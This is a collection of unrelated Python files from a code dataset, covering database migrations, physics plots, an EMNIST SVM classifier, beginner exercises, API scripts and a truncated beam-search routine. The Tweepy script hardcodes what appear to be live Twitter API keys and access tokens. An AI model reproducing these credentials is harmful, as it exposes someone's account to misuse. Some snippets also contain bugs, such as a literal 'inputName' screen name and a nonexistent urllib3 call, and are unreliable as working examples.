gc.collect()","sub_path":"pgmain.py","file_name":"pgmain.py","file_ext":"py","file_size_in_byte":14107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"642512134","text":"\"\"\"changes to pitch class\n\nRevision ID: 1eb964d9a352\nRevises: ae07c174daea\nCreate Date: 2018-06-26 08:42:49.423848\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = '1eb964d9a352'\ndown_revision = 'ae07c174daea'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('pitches', sa.Column('author', sa.Integer(), nullable=True))\n op.add_column('pitches', sa.Column('category', sa.String(), nullable=True))\n op.add_column('pitches', sa.Column('content', sa.String(), nullable=True))\n op.add_column('pitches', sa.Column('title', sa.String(), nullable=True))\n op.drop_constraint('pitches_user_id_fkey', 'pitches', type_='foreignkey')\n op.create_foreign_key(None, 'pitches', 'users', ['author'], ['id'])\n op.drop_column('pitches', 'pitch_desc')\n op.drop_column('pitches', 'user_id')\n op.drop_column('pitches', 'pitch_category')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('pitches', sa.Column('pitch_category', sa.VARCHAR(), autoincrement=False, nullable=True))\n op.add_column('pitches', sa.Column('user_id', sa.INTEGER(), autoincrement=False, nullable=True))\n op.add_column('pitches', sa.Column('pitch_desc', sa.VARCHAR(), autoincrement=False, nullable=True))\n op.drop_constraint(None, 'pitches', type_='foreignkey')\n op.create_foreign_key('pitches_user_id_fkey', 'pitches', 'users', ['user_id'], ['id'])\n op.drop_column('pitches', 'title')\n op.drop_column('pitches', 'content')\n op.drop_column('pitches', 'category')\n op.drop_column('pitches', 'author')\n # ### end Alembic commands ###\n","sub_path":"migrations/versions/1eb964d9a352_changes_to_pitch_class.py","file_name":"1eb964d9a352_changes_to_pitch_class.py","file_ext":"py","file_size_in_byte":1768,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"528481938","text":"# Esta funcin clcula la velocidad tangencial promedio en un intervalo de radio determinado. \n\n# input : \n# -- x: posicin en la direccin x\n# -- y: posicin en la direccin y\n# -- vx: velocidad en la direccin x\n# -- vy: velocidad en la direccin y\n\n# output: \n# -- vcir: velocidad promedio tangente al vector posicin en un radio determinado\n\nimport numpy as np \n\ndef Vcir(x,y,vx,vy):\n ux = (y/np.sqrt(x**2 + y**2)) # vector unitario x \n uy = (-x/np.sqrt(x**2 + y**2)) # vector unitario y\n pp = ux*vx + uy*vy # producto punto \n vcir = np.abs(np.sum((pp))/np.shape(vx)[0]) # velocidad tangencial \n return(vcir)\n","sub_path":"Vcir.py","file_name":"Vcir.py","file_ext":"py","file_size_in_byte":702,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"428468929","text":"from scipy import *\nimport numpy as np\nfrom numpy import sin, cos, sqrt, arctan, pi, exp\nimport matplotlib.pyplot as plt\nfrom qutip import *\nfrom scipy import integrate\nfrom scipy.integrate import quad, dblquad, nquad\nimport math\nfrom sympy import *\n\n# refer:Physics Reports 718–719 (2017) 1–102\n# Microwave photonics with superconducting quantum circuits\n# Xiu Gu a,b,1, Anton Frisk Kockum b,1, Adam Miranowicz b,c, Yu-xi Liu a,b,d,*,\n# Franco Nori b,e,*\n\nng_list = np.arange(-2.2, 2.2, 0.1)\n\ndef Hami(ng,Ec = 1, Ej = 1):\n nq = 40\n Hm = 0\n for i in range(nq):\n Hm += 4 * Ec * ((i - nq / 2) - ng) ** 2 * basis(nq, i) * basis(nq, i).dag()\n if i >= 1:\n Hm += -0.5 * Ej * (basis(nq, i) * basis(nq, i - 1).dag())\n Hm += -0.5 * Ej * (basis(nq, i - 1) * basis(nq, i).dag())\n\n return Hm\n\n\ndef get_eigenenergy_list(Ec = 1, Ej = 1):\n E_list = []\n for ng in ng_list:\n H = Hami(ng,Ec = Ec, Ej = Ej)\n E_list.append(H.eigenenergies())\n return E_list\n\n\ndef draw(save=False, ymax=2.5):\n fig, axes = plt.subplots(1, 3, figsize=(15, 5))\n\n ec = 1\n ej = 1\n E01_ava = Hami(1 / 2, Ec=ec, Ej=ej).eigenenergies()\n E01 = E01_ava[1] - E01_ava[0]\n\n Ezero = Hami(-2, Ec=ec, Ej=ej).eigenenergies()\n E_zero = Ezero[0]\n\n E_list = get_eigenenergy_list(Ec=ec, Ej=ej)\n\n axes[0].plot(ng_list, [(E[0] - E_zero) / E01 for E in E_list], c='black')\n axes[0].plot(ng_list, [(E[1] - E_zero) / E01 for E in E_list], c='red')\n axes[0].plot(ng_list, [(E[2] - E_zero) / E01 for E in E_list], c='blue')\n axes[0].plot(ng_list, [(E[3] - E_zero) / E01 for E in E_list])\n axes[0].plot(ng_list, [(E[4] - E_zero) / E01 for E in E_list])\n axes[0].set_xlabel(r'$n_g$', fontsize=15)\n axes[0].set_ylabel(r'$E_m/E_{01}$', fontsize=15)\n axes[0].set_xlim(-2, 2)\n axes[0].set_title(r'$E_J/E_C = 1$', fontsize=15)\n\n ec = 1\n ej = 10\n E01_ava = Hami(1 / 2, Ec=ec, Ej=ej).eigenenergies()\n E01 = E01_ava[1] - E01_ava[0]\n\n Ezero = Hami(-2, Ec=ec, Ej=ej).eigenenergies()\n E_zero = Ezero[0]\n\n E_list = get_eigenenergy_list(Ec=ec, Ej=ej)\n\n\n axes[1].plot(ng_list, [(E[0] - E_zero) / E01 for E in E_list], c='black')\n axes[1].plot(ng_list, [(E[1] - E_zero) / E01 for E in E_list], c='red')\n axes[1].plot(ng_list, [(E[2] - E_zero) / E01 for E in E_list], c='blue')\n axes[1].plot(ng_list, [(E[3] - E_zero) / E01 for E in E_list])\n axes[1].plot(ng_list, [(E[4] - E_zero) / E01 for E in E_list])\n axes[1].set_xlim(-2, 2)\n axes[1].set_xlabel(r'$n_g$', fontsize=15)\n axes[1].set_title(r'$E_J/E_C = 10$', fontsize=15)\n\n ec = 1\n ej = 50\n E01_ava = Hami(1 / 2, Ec=ec, Ej=ej).eigenenergies()\n E01 = E01_ava[1] - E01_ava[0]\n\n Ezero = Hami(-2, Ec=ec, Ej=ej).eigenenergies()\n E_zero = Ezero[0]\n\n E_list = get_eigenenergy_list(Ec=ec, Ej=ej)\n\n\n axes[2].plot(ng_list, [(E[0] - E_zero) / E01 for E in E_list], c='black')\n axes[2].plot(ng_list, [(E[1] - E_zero) / E01 for E in E_list], c='red')\n axes[2].plot(ng_list, [(E[2] - E_zero) / E01 for E in E_list], c='blue')\n axes[2].plot(ng_list, [(E[3] - E_zero) / E01 for E in E_list])\n axes[2].plot(ng_list, [(E[4] - E_zero) / E01 for E in E_list])\n\n axes[2].set_xlim(-2, 2)\n axes[2].set_xlabel(r'$n_g$', fontsize=15)\n\n axes[2].set_title(r'$E_J/E_C = 50$', fontsize=15)\n\n\n if save == True:\n fig.savefig(fname='fig\\\\eigenenergies_EjtoEc=' + str(rate_EjEc) + '.png')\n return 'good'\n\n\ndraw(save=False, 
ymax=2.5)\nplt.show()\nhelp(set_title())","sub_path":"study_180718/code/reading_simu/review/transmon_eigen.py","file_name":"transmon_eigen.py","file_ext":"py","file_size_in_byte":3526,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"275072429","text":"import tweepy\nfrom tweepy import OAuthHandler\nimport os\nimport io\nimport wget\nimport urllib3.request\nfrom google.cloud import vision\nfrom google.cloud.vision import types\n\nconsumer_key = 'bvay7XKTdnuVg2TawE3OvY89D'\nconsumer_secret = '8tDJygIpj9nkmpBUENlFEG5Cxkgny9D2MOISVcdAYfOutNQ9JI'\naccess_token = '1040111094516404224-Wdo2WoRvvtvnEXVTD7GdqL8J8GJb6y'\naccess_secret = 'WV0VlSbnpIBNmGTR9nYVcsTAleB4mo48VfqplHayjcJPn'\n\ndef get_images(inputName):\n auth = OAuthHandler(consumer_key, consumer_secret)\n auth.set_access_token(access_token, access_secret)\n api = tweepy.API(auth)\n\n tweets = api.user_timeline(screen_name='inputName',count=30, include_rts=False,exclude_replies=True)\n images = []\n i = 0\n for status in tweets:\n image = status.entities.get('media', [])\n if(len(image) > 0):\n image_url = status.entities['media'][0]['media_url']\n file_name = \"%03d.jpg\"%i\n urllib3.request.urlretrieve(image_url, file_name)\n images.append(file_name)\n i = i+1\n\n return images\n\nget_images('kobebryant')\n\n'''def conver_mp4():\n command0 = 'ffmpeg -y -r 0.5 -i %03d.jpg -vf scale=-600:600 -y -r 30 -t 60 test.mp4'\n os.system(command0)\n\ndef descript():\n\n\n client = vision.ImageAnnotatorClient()\n\n\n file_name = os.path.join(\n os.path.dirname(__file__),\n 'resources/wakeupcat.jpg')\n\n for image in image_file\n with io.open(file_name, 'rb') as image_file:\n content = image_file.read()\n\n image = types.Image(content=content)\n\n # Performs label detection on the image file\n response = client.label_detection(image=image)\n labels = response.label_annotations\n\n print('Labels:')\n for label in labels:\n print(label.description)\n\n\n\n'''","sub_path":"miniproj1part1part2finish.py","file_name":"miniproj1part1part2finish.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"427282540","text":"import RPi.GPIO as GPIO\nimport time\nimport socketio\nfrom model.util.Config import Config\nfrom model.util.Socket import Socket\nfrom model.util.AQI import AQI\nimport random\n\ndef beep(seconds):\n GPIO.output(PIN_NUM, True)\n time.sleep(seconds)\n GPIO.output(PIN_NUM, False)\n\ndef beep_action(sec, sleep_sec):\n beep(sec)\n time.sleep(sleep_sec)\n\n# 取得設定檔案\nconfig = Config()\nPIN_NUM = int(config.getValue('buzzer', 'pin'))\nPIN_MODE = config.getValue('buzzer', 'mode')\n\n# 初始化蜂鳴器速度\naqi = AQI()\nMETRIX = ['CO', 'LPG', 'Smoke']\nscore, total = aqi.get_latest_value(METRIX)\nSLEEP = 1 * ((total-score)/total)\n\n# 初始化 socket\nsocket = Socket()\nconnection = socket.connect()\nsio = socket.get_socket()\n\n# 如果WebSocker建立連線成功\nif connection:\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(PIN_NUM, GPIO.OUT)\n\n @sio.on('buzzer_off_publish_server', namespace='/pi')\n @sio.on('server_clean_pub', namespace='/pi')\n def on_message(data):\n print(\"[@Buzzer]TEST\")\n global status\n status = False\n\n @sio.on('buzzer_status_check_pub_system', namespace='/pi')\n def check(data):\n print('[@Buzzer] Buzzer Check...')\n sio.emit('buzzer_status_pub_pi', {'status': True, 'method': '被動'}, namespace='/pi')\n\n # 取得最新感測資料\n @sio.on('sensor_data_pub_system', namespace='/system')\n def latest(payload):\n global aqi\n global METRIX\n global SLEEP\n score, total = aqi.calc(METRIX, payload['data'])\n SLEEP = 1 * ((total-score)/total)\n print(\"[@Buzzer] 目前分數(越低越佳)\", score, \"/\", total)\n\n status = True\n\n # Change duty cycle for varying the brightness of buzzer.\n while status:\n sio.emit('buzzer_status_pub_pi', {'status': True}, namespace='/pi')\n beep_action(0.01, SLEEP)\n\n try:\n sio.call(event='buzzer_status_pub_pi', data={'status': False}, namespace='/pi', timeout=30)\n print('wait')\n except socketio.exceptions.TimeoutError as err:\n print('timeout')\nelse:\n print(\"[@Buzzer] 無法建立WebSocket連線,資料無法發送\")\n\nsocket.close()\n","sub_path":"Buzzer.py","file_name":"Buzzer.py","file_ext":"py","file_size_in_byte":2142,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"258290571","text":"#1. accepts the gender in terms of male or female from user. (if client enters wrong input instead of putting error it will display an appropriate msg And exits. )\ngender = input(\"Enter gender\\t\")\nif gender == 'male' or gender == 'female'or gender == 'Male' or gender == 'Female' or gender == 'MALE' or gender == 'FEMALE':\n print(\"Correct\")\nelse:\n print(\"wrong input\")\n\n#2. Accept the name, and prints the name with salutation according to gender like sir ( \"Hello input-wala-name, sir\") for male and mam for female...\nname = input(\"Enter name \")\ngen = input(\"Enter sex, m for mae, f for female \")\nif name.isalpha():\n if gen == 'm':\n print(\"Hello {} sir\".format(name))\n elif gen == 'f':\n print(\"Hello {} ma'am\".format(name))\n else:\n print(\"Wrong gender entered, enter only m or f\")\nelse:\n print(\"Wrong name entered\")\n\n\n'''3. Ask their age and check the age criteria, if the age of man is greater than 20, it will print.. you are able to enroll\n for python fundamental course otherwise it will display an msg that you are below age criteria\n you can't enroll the course..and exits. (program does not throw any kind of error here.) '''\nage = int(input(\"Enter age \"))\nif age>20:\n print(\"You are able to enroll for python fundamental course\")\nelse:\n print(\"you are below age criteria and you can't enroll the course..\")\n\n\n#4.if Age of women is greater than 19 she is available to enroll for core Java course.(same criteria error will not displayed)\nage = int(input(\"Enter age \"))\nif age>19:\n print(\"You are able to enroll for java course\")\nelse:\n print(\"you are below age criteria and you can't enroll the course..\")\n\n\n'''5. If user enters wrong value like in case of input of name of he enters numeric value, does not enter name by passing simply enter,\n it will guide the user to enter alphabetic value and some text incase of blank input. '''\n\nname = input(\"Enter name \")\nage = input(\"Enter age \")\nif name.isalpha():\n print(\"Name is \",name)\nelse:\n print(\"Wrong input, enter alphabetical name\")\nif age.isnumeric():\n print(\"Age is \",age)\nelse:\n print(\"Enter ony numeral age\")\n\n\n\n","sub_path":"Extra1.py","file_name":"Extra1.py","file_ext":"py","file_size_in_byte":2152,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"167320107","text":"from openpyxl import Workbook\nfrom openpyxl import load_workbook\n\ndef get_data(ro,col,sheet):\n return sheet.cell(row = ro, column = col).value\n\n#main\n\n#load the excel\nwork_b = load_workbook(filename='_ori.xlsx') #here is the name of your xlsx file\nsheetnames = work_b.get_sheet_names()\nsheet = work_b.get_sheet_by_name(sheetnames[0])\n\nwb = Workbook() # Creat sheet\nws = wb.active\n\n#\npre = 0\nr_row =1\nseq = 1\nfor row in range(1,500000):\n if get_data(row,1,sheet) == \"stop_here\":\n ws['A' + str(r_row)] = \"stop_here\"\n break\n if get_data(row,1,sheet) == \"another_day\":\n ws['A' + str(r_row)] = \"another_day\"\n print(r_row)\n r_row += 1\n continue\n section = int(get_data(row, 6, sheet))\n\n if (get_data(row, 1, sheet) == \"section\") :\n pre = int(get_data(row, 5, sheet))\n first = row\n if section>1:\n ws['A' + str(r_row)] = get_data(row, 1, sheet)\n ws['E' + str(r_row)] = seq - 1\n ws['F' + str(r_row)] = get_data(row, 6, sheet)-1\n r_row += 1\n seq = 1\n continue\n if(section>1):\n repeat = True\n for i in range(1,pre+1):\n if (get_data(row, 4, sheet) == get_data(first - i, 4, sheet)) & (get_data(row, 2, sheet) == get_data(first - i, 2, sheet)) & (\n get_data(row, 3, sheet) == get_data(first - i, 3, sheet) ):\n repeat = False\n break\n if repeat == True:\n ws['A' + str(r_row)] = get_data(row, 1, sheet)\n ws['B' + str(r_row)] = get_data(row, 2, sheet)\n ws['C' + str(r_row)] = get_data(row, 3, sheet)\n ws['D' + str(r_row)] = get_data(row, 4, sheet)\n ws['E' + str(r_row)] = seq\n ws['F' + str(r_row)] = get_data(row, 6, sheet)-1\n r_row += 1\n seq+=1\n\nwb.save(\"_fix_rp.xlsx\")\n","sub_path":"Assignment02/Gaussian_extraction/step2_repeatscan.py","file_name":"step2_repeatscan.py","file_ext":"py","file_size_in_byte":1873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"160091052","text":"import requests\n\nuser_id = 'id385236652'\napi_url = 'https://api.vk.com/method/'\n\ndef get_user(name):\n data = requests.get(api_url+'users.get',{'fields': 'photo_max',\n 'user_ids':name,\n 'v':'5.74'})\n return data.json()\nprint(get_user(user_id))\n\ndef get_friends(name):\n data = requests.get(api_url+'friends.get',{'user_id':name,\n 'v':'5.74'})\n return data.json()\n\nfriends1 = set(get_friends('311867269')['response']['items'])\nfriends2 = set(get_friends('385236652')['response']['items'])\nprint(friends1&friends2)\n\n\n\nfriends = friends1 & friends2\n\n\n\n\nfor i in friends:\n print(get_user(i))\n\n\n#user = get_user(user_id)\n#url_image = user['response'][0]['photo_max']\n#image = requests.get(url_image)\n#image_file=open('image.jpg','wb')\n#image_file.write(image.content)\n#image_file.close()\n#print(user)\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"47531656","text":"import numpy as np\nimport pandas as pd\nimport matplotlib.pyplot as plt\nfrom sklearn import svm, metrics\nfrom sklearn.model_selection import train_test_split\n\n\nclass_mapping = '_ABCDEFGHIJKLMNOPQRSTUVWXYZ'\nlabels=['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z']\n#labels=['0','1','2','3','4','5','6','7','8','9']\ndef load_data():\n \"\"\" Loads data from the data set, returns x and y for both test and train \"\"\"\n # Letters\n train_data_path = 'emnist/emnist-letters-train.csv'\n test_data_path = 'emnist/emnist-letters-test.csv'\n\n #Digits\n #train_data_path = 'emnist/emnist-digits-train.csv'\n #test_data_path = 'emnist/emnist-digits-test.csv'\n\n train_data = pd.read_csv(train_data_path, header=None)\n test_data = pd.read_csv(test_data_path, header=None)\n\n # Separate labels from data and convert to numpy arrays\n X_train = (train_data.iloc[:, 1:].values)\n y_train = train_data.iloc[:, 0].values\n X_test = (test_data.iloc[:, 1:].values)\n y_test = test_data.iloc[:, 0].values\n\n return X_train, y_train, X_test, y_test\n\ndef plot_heatmap(expected,predicted,labels):\n\n \"\"\"Plots a confusion matrix for expected and predicted values. \"\"\"\n fig, ax = plt.subplots()\n cm=metrics.confusion_matrix(expected, predicted)\n plt.imshow(cm,aspect='auto')\n print(cm.shape, len(labels))\n cbar=plt.colorbar()\n cbar.ax.tick_params(labelsize=14)\n plt.xticks(np.arange(len(labels)),labels,fontsize=14)\n plt.yticks(np.arange(len(labels)),labels,fontsize=14)\n #Add text\n for i in range(len(cm)):\n for j in range(len(cm)):\n if cm[i][j]<10:\n text_s='%01.0f' % (cm[i][j])\n else:\n text_s='%02.0f' % (cm[i][j])\n\n if cm[i][j]>500: #black is most sutable on yellow background\n text = ax.text(j, i, text_s, ha=\"center\", va=\"center\", color=\"k\",fontsize=14)\n\n else:#white is most sutable on purple background\n text = ax.text(j, i, text_s, ha=\"center\", va=\"center\", color=\"w\",fontsize=14)\n plt.ylabel('Expected',fontsize=14)\n plt.xlabel('Predicted',fontsize=14)\n plt.savefig(\"cm_digits_test_.pdf\")\n plt.show()\n\ndef find_images(test_samples, expected,predicted,labels):\n \"\"\"Creats images of misclassified letters. Saves the images. 
It is costumized to find L,I,Q and G,\n future work will be to make it more general \"\"\"\n L=True; I=True; Q=True; G=True # It stops after finding one image of each class\n for i in range(test_samples):\n if expected[i]!=predicted[i] and expected[i]==12 and predicted[i]==9 and L==True:\n plt.figure()\n plt.title('Expected: ' + labels[11] + ', Predicted: ' + labels[8], fontsize=14)\n print(i,data_test[i, 1:].shape)\n img_flip = np.transpose(data_test[i, 0:].reshape(28, 28), axes=[1,0])\n plt.imshow(img_flip, cmap='Greys_r')\n plt.savefig('L_I.pdf')\n L=False\n if expected[i]!=predicted[i] and expected[i]==9 and predicted[i]==12 and I==True:\n print('her')\n plt.figure()\n plt.title('Expected: ' + labels[8] + ', Predicted: ' + labels[11], fontsize=14)\n print(i,data_test[i, 1:].shape)\n img_flip = np.transpose(data_test[i, 0:].reshape(28, 28), axes=[1,0])\n plt.imshow(img_flip, cmap='Greys_r')\n plt.savefig('I_L.pdf')\n I=False\n if expected[i]!=predicted[i] and expected[i]==7 and predicted[i]==17 and G==True:\n plt.figure()\n plt.title('Expected: ' + labels[6] + ', Predicted: ' + labels[16], fontsize=14)\n print(i,data_test[i, 1:].shape)\n img_flip = np.transpose(data_test[i, 0:].reshape(28, 28), axes=[1,0])\n plt.imshow(img_flip, cmap='Greys_r')\n plt.savefig('G_Q.pdf')\n G=False\n if expected[i]!=predicted[i] and expected[i]==17 and predicted[i]==7 and Q==True:\n plt.figure()\n plt.title('Expected: ' + labels[16] + ', Predicted: ' + labels[6], fontsize=14)\n print(i,data_test[i, 1:].shape)\n img_flip = np.transpose(data_test[i, 0:].reshape(28, 28), axes=[1,0])\n plt.imshow(img_flip, cmap='Greys_r')\n plt.savefig('Q_G.pdf')\n Q=False\n\n\n\nX_train, y_train, X_test, y_test = load_data()\n\ntrain_samples=len(X_train)\ntest_samples=len(X_test)\n\ndata=X_train\ndata_test=X_test\n\n#Use suport vector machine to predict.\nclassifier = svm.SVC(degree=2,kernel='poly')\nclassifier.fit(data,y_train)\n\nexpected = y_test\npredicted = classifier.predict(data_test)\nexpected_train=y_train\npredicted_train=classifier.predict(data)\n\nfind_images(test_samples, expected,predicted,labels)\nprint(\"accuracy test= \",metrics.accuracy_score(expected, predicted))\nprint(\"accuracy train= \",metrics.accuracy_score(expected_train, predicted_train))\nplot_heatmap(expected,predicted,labels)\n","sub_path":"SMV_emnist.py","file_name":"SMV_emnist.py","file_ext":"py","file_size_in_byte":4950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"648185661","text":"#Data Types, Operators and Expressions\n# -*- coding: UTF-8 -*-\n\na = 11\nb = 22\n\n#优:速度快 缺:多分配了内存\ns = \"{} {}\".format(a, b)\nt = a\na = b\nb = t\nprint(s + \" => {} {}\".format(a, b))\n\n#优:节约内存分配 缺:速度慢,不支持浮点数对换\ns = \"{} {}\".format(a, b)\na = a ^ b\nb = a ^ b\na = a ^ b\nprint(s + \" => {} {}\".format(a, b))\n\n#优:内存分配少 缺:速度慢,运算过程中可能发生数据溢出(但不影响计算结果)\ns = \"{} {}\".format(a, b)\na = a + b\nb = a - b\na = a - b\nprint(s + \" => {} {}\".format(a, b))\n\n#优:代码简洁,可读性高 缺:效率有可能偏慢(由解释器决定)\ns = \"{} {}\".format(a, b)\na, b = b, a\nprint(s + \" => {} {}\".format(a, b))\n\nf1 = 1.6667\nf2 = 1.6668\ndt = 1e-3\nisEq = f1 > f2 - dt and f1 < f2 + dt\nfmsg = 'eq' if (isEq) else 'ne'\nprint(\"{} {} {} {}\".format(f1, f2, dt, fmsg))\n\nyear = 2016\nisLeap = year & 3 == 0 and year % 100 != 0 or year % 400 == 0\nymsg = 'yes' if (isLeap) else 'no'\nprint(\"{} {}\".format(year, ymsg))\n\nc = 5\nisEven = c % 2 == 0\nemsg = 'even' if (isEven) else 'odd'\nprint(\"{} {}\".format(c, emsg))\n\nisEven = c & 1 == 0\nemsg = 'even' if (isEven) else 'odd'\nprint(\"{} {}\".format(c, emsg))\n\nn = 8\nis2k = n > 0 and n & (n - 1) == 0\nkmsg = 'yes' if (is2k) else 'no'\nprint(\"{} {}\".format(n, kmsg))\n\nn1 = 3\nans = (n1 << 4) + n1\nprint(\"{} x 17 = {}\".format(n1, ans))\n\nn2 = 10\nans1 = n2 & 7\nprint(\"{} % 8 = {}\".format(n2, ans1))\n\nn3 = 0b11100000\nans2 = n3 >> 4\nprint(\"{} / 16 = {}\".format(n3, ans2))\n\nm = 0o644\nm1 = 0o600\nm2 = m | 0o111\nm3 = m | 0o200\nm4 = m & 0o755\nprint('{:o}: {:o} {:o} {:o} {:o}'.format(m, m1, m2, m3, m4))\n","sub_path":"operators/dark-w.py","file_name":"dark-w.py","file_ext":"py","file_size_in_byte":1635,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"254363018","text":"#\n\narray = [i for i in range(2, 100)]\narray1 = [i for i in range(2, 10)]\n\nprint(array)\nprint(array1)\namount = 0\nfor i in array1:\n for j in array:\n if j % i == 0:\n amount += 1\n print(f'{i} => {amount} раз')\n amount = 0\n","sub_path":"lesson3/task1.py","file_name":"task1.py","file_ext":"py","file_size_in_byte":246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"149289689","text":"def requirements():\n print('''1. Program converts user-entered temperature into Fahrenheit or Celsius scales\n2. Program comntinues to prompt user until specified not to\n3. Note: upper and lowercase letters permited, though incorrect entries are not permited\n4. Note: Program does not validate numeric data''' )\n\ndef convertion():\n scale = input('Fahrenheit to Celsius? Type \"f\", or Celsius to Fahrenheit? Type \"c\": ')\n scale = scale.lower()\n if scale == 'f':\n temp = float(input('Enter temperature in Fehrenheit: '))\n temp = float(((temp - 32) * 5)/9)\n print('Temperature in Celsius is:', round(temp,1))\n elif scale == 'c':\n temp = float(input('Enter temperature in Celsius: '))\n temp = float(((temp * 9)/5)+32)\n print('Temperature in Fehrenheit is:', round(temp,1))\n else: \n print('Not a valid option')\n\n\n\ndef main():\n requirements()\n print()\n init = input('Do you want to convert a temperature (y or n)? ')\n print()\n while True:\n init = init.lower()\n if init == 'y':\n convertion()\n print()\n init = input('Do you want to convert another temperature (y or n)? ')\n print()\n elif init == 'n':\n print('Thank you for using my temperature convertion program')\n break\n else: \n print('Incorrect entry. Please try again')\n init = input('Do you want to convert a temperature (y or n)? ')\n print()\n\n\nmain()","sub_path":"skillSet/skillSet12.py","file_name":"skillSet12.py","file_ext":"py","file_size_in_byte":1502,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"300980688","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport cv2\nimport time\nimport os\nos.environ[\"CUDA_VISIBLE_DEVICES\"] = \"1\"\nimport random\nimport torch\nfrom new_dataset import myDataset\nfrom new_scoreAgent import scoreEvaluator\nfrom tqdm import tqdm\nimport threading\nfrom new_utils import visualization, candidate_enumerate, reduce_duplicate_candidate, Graph, Candidate\nfrom SVG_utils import svg_generate\n\ndata_folder = '/local-scratch/fuyang/cities_dataset'\nbeam_width = 6\nbeam_depth = 10\nis_visualize = False\nis_save = True\nsave_path = '/local-scratch/fuyang/result/beam_search_v2/without_search_constraint/old/'\n\n\ntest_dataset = myDataset(data_folder, phase='valid', edge_linewidth=2, render_pad=-1)\n\ntest_loader = torch.utils.data.DataLoader(test_dataset,\n batch_size=1,\n shuffle=True,\n num_workers=1,\n drop_last=True)\n\nevaluator = scoreEvaluator({'cornerModelPath':'/local-scratch/fuyang/result/corner_v2/gt_mask_with_gt/models/440.pt',\n 'edgeModelPath':'/local-scratch/fuyang/result/corner_edge_region/edge_graph_drn26_with_search_v2/models/best.pt',\n 'regionModelPath': '/local-scratch/fuyang/result/corner_edge_region/region_graph_iter_0/models/70.pt',\n 'region_iter': 0,\n 'edgeHeatmapPath': '/local-scratch/fuyang/result/corner_edge_region/edge_heatmap_unet/all_edge_masks',\n 'regionHeatmapPath': '/local-scratch/fuyang/result/corner_edge_region/all_region_masks',\n 'regionEntireMaskPath': '/local-scratch/fuyang/result/corner_edge_region/entire_region_mask'\n }, useHeatmap=('region'), useGT=(), dataset=test_dataset)\n\n\nclass _thread(threading.Thread):\n def __init__(self, threadID, name, candidate, lock, result_list, func):\n threading.Thread.__init__(self)\n self.threadID = threadID\n self.name = name\n self.candidate = candidate\n self.lock = lock\n self.result_list = result_list\n self.func = func\n def run(self):\n print('running id: ', self.name)\n start_time = time.time()\n candidates = self.func(self.candidate)\n print('test: =================================', self.name, len(candidates))\n self.lock.acquire()\n self.result_list.extend(candidates)\n self.lock.release()\n print(self.name, \"spend time: {}s\".format(time.time()-start_time))\n\n\n\ndef save_candidate_image(candidate, base_path, base_name):\n corners = candidate.graph.getCornersArray()\n edges = candidate.graph.getEdgesArray()\n # graph svg\n svg = svg_generate(corners, edges, base_name, samecolor=True)\n svg.saveas(os.path.join(base_path, base_name+'.svg'))\n # corner image\n temp_mask = np.zeros((256,256))\n for ele in candidate.graph.getCorners():\n if ele.get_score() < 0:\n temp_mask = cv2.circle(temp_mask, ele.x[::-1], 3, 1, -1)\n fig = plt.figure(frameon=False)\n fig.set_size_inches(1,1)\n ax = plt.Axes(fig, [0.,0.,1.,1.])\n ax.set_axis_off()\n fig.add_axes(ax)\n ax.imshow(temp_mask, aspect='auto')\n fig.savefig(os.path.join(base_path, base_name+'_corner.png'), dpi=256)\n # edges image\n temp_mask = np.zeros((256,256))\n for ele in candidate.graph.getEdges():\n if ele.get_score() < 0:\n A = ele.x[0]\n B = ele.x[1]\n temp_mask = cv2.line(temp_mask, A.x[::-1], B.x[::-1], 1, thickness=1)\n ax.imshow(temp_mask, aspect='auto')\n fig.savefig(os.path.join(base_path, base_name+'_edge.png'), dpi=256)\n # region no need fig\n plt.close()\n\n\nfor idx, data in enumerate(test_loader):\n name = data['name'][0]\n #if name != '1553901866.54':\n # continue\n img = data['img'][0]\n graph_data = test_dataset.getDataByName(name)\n conv_data = graph_data['conv_data']\n 
corners = conv_data['corners']\n corners = np.round(corners).astype(np.int)\n edges = conv_data['edges']\n\n gt_data = graph_data['gt_data']\n gt_corners = gt_data['corners']\n gt_corners = np.round(gt_corners).astype(np.int)\n gt_edges = gt_data['edges']\n\n # gt score\n gt_candidate = Candidate.initial(Graph(gt_corners, gt_edges), name)\n evaluator.get_score(gt_candidate)\n\n # initial score\n initial_candidate = Candidate.initial(Graph(corners, edges), name)\n\n print(\"####################################################################\")\n print(\"####################################################################\")\n print(name)\n print(\"####################################################################\")\n print(\"####################################################################\")\n evaluator.get_score(initial_candidate)\n\n # candidate gallery\n candidate_gallery = []\n candidate_gallery.append([initial_candidate])\n\n epoch = min(beam_depth, corners.shape[0]*2)\n prev_candidates = [initial_candidate]\n best_candidates = [initial_candidate]\n _best_count = 0\n for epoch_i in range(epoch):\n print(\"======================== 